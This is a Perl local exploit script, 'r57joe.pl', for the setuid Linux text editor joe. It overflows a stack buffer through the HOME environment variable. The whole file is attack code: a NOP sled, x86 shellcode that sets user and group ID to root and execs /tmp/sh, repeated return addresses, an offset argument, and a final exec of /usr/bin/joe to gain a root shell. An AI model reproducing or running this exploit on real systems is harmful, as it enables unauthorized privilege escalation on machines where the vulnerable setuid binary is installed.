#!/usr/bin/perl

# ***
#  __________               ___ ___  
#  \______   \__ __  ______/   |   \ 
#   |       _/  |  \/  ___/    _    \
#   |    |   \  |  /\___ \\         /
#   |____|_  /____//____  >\___|_  / 
#          \/           \/       \/  
# ***
# r57joe.pl
# Linux "joe" local exploit
# by 1dt.w0lf // RusH security team
# www.rsteam.ru , http://rst.void.ru
# ***
# usage: ./r57joe [offset]
# by default offset = -1000 : tested on ASPlinux 9.0

$len=1056;
$ret = 0xbfffffb1;
$offset = -1000;
$nop = "\x90";

# proof of concept
$shellcode ="\x31\xdb\x89\xd8\xb0\x17\xcd\x80" .
            "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" .
            "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07" .
            "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b" .
            "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff" .
            "\xff\xff\x01\x2f\x74\x6d\x70\x2f\x73\x68\x01";

if(@ARGV != 1)
{
print "-----------------------------\n";
print "*** r57joe.pl\n";
print "*** linux joe local exploit\n";
print "*** usage: ./r57joe.pl [offset]\n";
print "*** offset -1000 : tested on ASPLinux 9.0\n";
print "-----------------------------\n";
exit();
}

if (@ARGV == 1)
{
$offset = $ARGV[0];
}

if( ! -u "/usr/bin/joe" )
{
        print "joe is not suid =(((\n";
        exit();
}

for ($i = 0; $i < ($len - length($shellcode) - 156); $i++)
      {
     $buffer .= $nop;
      }

$buffer .= $shellcode;

$pack_ret = pack('l', ($ret + $offset));
chomp($pack_ret);

for($i = 0; $i < 156; $i += 4)
     {
     $buffer .= $pack_ret;
     }
print "-----------------------------\n";
print "*** joe local exploit by r57\n";
print "-----------------------------\n";
print "OFFSET : $offset\n";
print "-----------------------------\n";
local($ENV{'HOME'}) = $buffer;
exec("/usr/bin/joe");


# EOF